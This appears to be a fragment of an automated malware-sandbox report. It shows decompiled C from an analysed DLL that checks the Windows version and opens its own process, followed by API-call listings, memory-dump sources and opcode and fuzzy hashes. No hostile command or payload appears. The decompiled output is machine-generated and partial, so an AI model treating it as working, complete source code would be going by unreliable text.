                                    				_t3 = GetVersion();
                                    				if(_t3 <= 5) {
                                    					_t4 = 0x32;
                                    					return _t4;
                                    				} else {
                                    					 *0x6e1d41ac = _t3;
                                    					_t5 = GetCurrentProcessId();
                                    					 *0x6e1d41a8 = _t5;
                                    					 *0x6e1d41b0 = _t8;
                                    					_t6 = OpenProcess(0x10047a, 0, _t5);
                                    					 *0x6e1d41a4 = _t6;
                                    					if(_t6 == 0) {
                                    						 *0x6e1d41a4 =  *0x6e1d41a4 | 0xffffffff;
                                    					}
                                    					return 0;
                                    				}
                                    			}









                                    0x6e1d146d
                                    0x6e1d147b
                                    0x6e1d1483
                                    0x6e1d1488
                                    0x6e1d14d2
                                    0x6e1d14d2
                                    0x6e1d148a
                                    0x6e1d1492
                                    0x6e1d14ce
                                    0x6e1d14d0
                                    0x6e1d1494
                                    0x6e1d1494
                                    0x6e1d1499
                                    0x6e1d14a7
                                    0x6e1d14ac
                                    0x6e1d14b2
                                    0x6e1d14ba
                                    0x6e1d14bf
                                    0x6e1d14c1
                                    0x6e1d14c1
                                    0x6e1d14cb
                                    0x6e1d14cb

                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1D17B8,74B063F0,00000000), ref: 6E1D147B
                                    • GetVersion.KERNEL32 ref: 6E1D148A
                                    • GetCurrentProcessId.KERNEL32 ref: 6E1D1499
                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1D14B2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462896399.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000003.00000002.462865338.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462921936.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462943765.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462959006.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: Process$CreateCurrentEventOpenVersion
                                    • String ID:
                                    • API String ID: 845504543-0
                                    • Opcode ID: 7311e68ffb75e489567802f5f5ac2ccbe649c9c0da85faad6802906716990c8c
                                    • Instruction ID: bd338f51c947558303e8a19a8bdda64994412a76ef1711d1dae909d0e46a1981
                                    • Opcode Fuzzy Hash: 7311e68ffb75e489567802f5f5ac2ccbe649c9c0da85faad6802906716990c8c
                                    • Instruction Fuzzy Hash: F2F03A71646A11AFEF919FA8AC0A74A3BE4BB17B11F10C11AF115DA1C0D3B06087BF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Debug_pointer__cftoe
                                    • String ID: !%x
                                    • API String ID: 1512280149-1893981228
                                    • Opcode ID: 62d51378dfc7a048a5687a297b70c798712217f1e1710925855b56c837466d7b
                                    • Instruction ID: ec181740c798826ef7df0350a3e58969fe88bf6597d8cd22ca2947a2d15225c7
                                    • Opcode Fuzzy Hash: 62d51378dfc7a048a5687a297b70c798712217f1e1710925855b56c837466d7b
                                    • Instruction Fuzzy Hash: A0516DB1D1424CDFCF04CFE8C850AEEBBB9AF54304F14861DE465AB281DB34AA49DB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%